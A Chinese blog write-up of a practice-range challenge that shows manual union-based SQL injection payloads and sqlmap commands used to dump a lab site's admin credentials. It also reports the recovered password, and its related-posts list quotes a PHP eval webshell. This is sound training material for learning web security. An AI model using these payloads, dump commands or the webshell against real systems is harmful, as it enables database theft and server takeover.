封神台在线靶场——第一章:为了女神小芳!

已于 2023-10-10 17:04:06 修改
阅读量294 收藏 2
点赞数
文章标签: 数据库
于 2023-10-10 16:20:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pigzlfa/article/details/133747022
版权

sql注入基础版

目录:

手工注入

sqlmap工具跑

在这里插入图片描述
打开传送门,有一个get型传参
在这里插入图片描述

手工注入

判断是否存在sql注入

?id=1 and 1=1

回显正常

在这里插入图片描述

?id=1 and 1=2

显示异常
初步判断存在sql注入
在这里插入图片描述

判断字段数

?id=1 order by 1
?id=1 order by 2

都显示正常

在这里插入图片描述

?id=1 order by 3

页面显示异常,说明有两个回显位
在这里插入图片描述

测试显示位

?id=7777 union select 1,2

在这里插入图片描述
2被输出,说明2的位置是我们要的显示位

爆数据库名

?id=7777 union select 1,(select group_concat(schema_name) from information_schema.schemata)
//这句是爆出所有的数据库名
?id=7777 union select 1,database()
//爆出当前数据库名称

在这里插入图片描述
在这里插入图片描述

爆当前数据库的表名

?id=7777 union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘maoshe’

在这里插入图片描述

看一下管理员表,爆列名

?id=7777 union select 1,group_concat(column_name)from information_schema.columns where table_name=‘admin’ and table_schema=‘maoshe’

在这里插入图片描述

爆username和password

?id=7777 union select 1,group_concat(username,‘~’,password,‘///’) from maoshe.admin

查询maoshe库下admin表的username及password字段,用’~'隔开两个字段,以及用///隔开两组查询结果
在这里插入图片描述

虽然但是,,ppt领取微信是什么鬼??装作没看到吧
最后得到管理员账号密码
admin/hellohack

二、使用sqlmap工具跑跑

sqlmap -u http://pu2lh35s.ia.aqlab.cn/?id=1

在这里插入图片描述爆当前数据库

sqlmap -u http://pu2lh35s.ia.aqlab.cn/?id=1 --current-db

在这里插入图片描述

爆表名

sqlmap -u http://pu2lh35s.ia.aqlab.cn/?id=1 -D maoshe --tables

在这里插入图片描述
爆列名

sqlmap -u http://pu2lh35s.ia.aqlab.cn/?id=1 -T admin --columns

在这里插入图片描述
爆用户名密码

sqlmap -u http://pu2lh35s.ia.aqlab.cn/?id=1 -D maoshe -T admin -C username,password --dump

在这里插入图片描述
over!

pigzlfa
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】
红凳子的博客
05-07 1989
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】前言判断是否存在SQL注入漏洞二、使用步骤1.引入库2.读入数据总结 前言 提示:通过sql注入拿到管理员密码! 尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站,学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了传送门 判断是否存在SQL注入漏洞 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二
神台靶场(一)为了女神小芳 【SQL注入攻击】(超级详细)
xiao_mai_的博客
05-11 723
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
登录别人的账户(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
神台靶场 第一章:为了女神小芳 (SQL注入)
m0_65712192的博客
10-14 1600
神台靶场 第一章:为了女神小芳 (SQL注入)
神台靶场 第一章:为了女神小芳!writeup
热门推荐
Sk1y的博客
02-15 2万+
神台靶场 第一章:为了女神小芳! 题目简述: 神台靶场,题目链接 解题过程: 首先是这样的url为: http://59.63.200.79:8003/ 当点击点击查看新闻时,相应的url变化,变为如下: http://59.63.200.79:8003/?id=1 ...
神台-靶场-第一章:为了女神小芳!(题解)+ 中北网安实训笔记-(20200701)-sql注入基本语法
tonyhapply的博客
07-18 1539
我们先来学习sql注入,
注入(一)
tomyyyyy
06-28 272
eg: 例子 第一步,判断是否存在sql注入漏洞 构造 ?id=1 and 1=1 ,回车 页面返回正常 构造 ?id=1 and 1=2 ,回车 页面不正常,初步判断这里 可能 存在一个注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 order by 1 回车 页面正常 构造 ?id=1 and 1=1 order by 2 回车 页面正常 构造 ?id=1 and 1=1 o...
神台-杂项8:奇怪的短信
最新发布
03-11
随波逐流工具,一个非常好用的解码工具
更改支付金额(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
通达信2指标——射箭神(副图).doc
07-30
通达信2指标——射箭神(副图).doc
通达信指标——射箭神(副图).doc
07-30
通达信指标——射箭神(副图).doc
如何使用sqlmap破解神台靶场第一关
weixin_44490353的博客
12-17 1573
文章目录一.查看是否有注入二.查找当前数据库三.查询数据库的表四.查询表中的列五.查询具体内容 一.查看是否有注入 使用命令 mysql.py -u http://59.63.200.79:8003/?id=1 --batch -u指令为查看网址的url是否有漏洞。-batch为永远不要求用户输入信息,默认执行。 我们可以看到,存在sql注入漏洞。 二.查找当前数据库 mysql.py -u http://59.63.200.79:8003/?id=1 -current-db -batch -cuurent
mbp 神台靶场 一(笔记)
qq_43558415的博客
02-09 1万+
最近在看掌控安全的公开课,里面提到了神台靶场,因为以前也做过网易云课堂的靶场,便轻车熟路地注册了账号登陆靶场,先看了第一关。第一关是通过SQL注入找到管理员密码,打开链接,点进去一看发现有猫腻。 一、寻找注入点 看到id=1,便可以用id=1’或id=1 and 1=2来进行测试,以id=1’为例,发现网页出现了错误。 二、判断字段数 在发现这可以进行SQL注入后便要判断它的字段数,用...
神台靶场尤里的复仇I第一第二第五第六第七章解题思路(持续更新)
weixin_50549897的博客
01-02 4552
提示:文## 标题章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录一 .第一章二.第二章1.引入库2.读入数据一 .第六章总结 提示: 本文按照靶场题目推进顺序进行,由于作者水平有限,有讲述不当之处敬请批评指出,有更好的解法欢迎在评论区发表。 本文将持续更新。靶场地址https://hack.zkaq.cn/battle 一 .第一章 **sql注入** 首先通过id=2判断是否存在sql注入 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2021
ctf实战 掌控安全的靶场 第一关通关记录
wh1te 小白的博客
09-17 5800
第一关 进入传送门  发现是一个猫舍网站  点击查看新闻   进入猫舍界面内 网址为http://120.203.13.75:6815/?id=1  疑似可注入  尝试 and1=1回显正常 尝试 and1=2回显失败 存在sql注入  可以选择手工注入  也可以直接用工具   这里我用的是sqlmap(一个很强大的工具) sqlmap具体使用方法自己百度 贴一个比较好的...
神台靶场-第一章
Mr_helloword的博客
07-12 2726
第一章:为了女神小芳! Tips: 通过sql注入拿到管理员密码! 寻找注入点,判断是什么注入 |?id=1 and 1=1| 显示正常 | |-|–| | ?id=1and 1=2| 页面有变故(存在注入) | |?id=1’ | 页面有回显但是无法判断注入类型| ||| 查看列数及字段数(这里通过二分法可以快速定位列数为2) 联合查询(注意前面id为假才会执行后门的联合查询) |?id=121 union select 1,2 #| 查看回显位置 | |–|--| |?id=1
神台----尤里的复仇I-第一章:为了女神小芳
正在学习的路上...
07-17 2999
1.找注入点 ?id=1 and 1=1 ------ 显示正常 ?id=1 and 1=2 ------ 不显示 2.猜列数、报显示位 ?id=1 order by 2 ------查询了两列 ?id=466454 select 1,2 ------将id设为一个不存在的数...
神台基础关,第一关
weixin_44106116的博客
11-19 1730
1.判断是否存在SQL注入 点击新闻,看到了地址栏变化,产生了id传参 分别输入,and 1=1 和,and 1=2 显示页面不同,所以,存在sql注入 2.查询字段数,好用联合查询 order by 2 有显示,order by 3 无显示,可知此条语句字段数为2 在之后输入 and 1=2 union select 1,2 注销掉前方的查询语句,查看回显点, 新闻内容中显示了数字2 根据...
upload-labs 靶场第一关
lowhacker的博客
12-14 2465
简介 upload-labs是一个使用php语言编写的,专门收集渗透测试过程中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共19关,每一关都包含着不同上传方式。 第一关 木马内容为<?php @eval($_POST['caidao']);?> 命名为admin.php 先以PHP格式上传试一下 我们再看一下源码 显而易见 这一关是通过限制上传文件的格式...
c4d修神记:零基础到三维神 下载
01-05
"c4d修神记:零基础到三维神"是一本关于学习Cinema 4D(简称C4D)软件的书籍。C4D是一款强大的三维建模、动画和渲染软件,广泛应用于电影、游戏、广告等领域。该书以零基础的读者为目标群体,旨在通过系统的教程和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值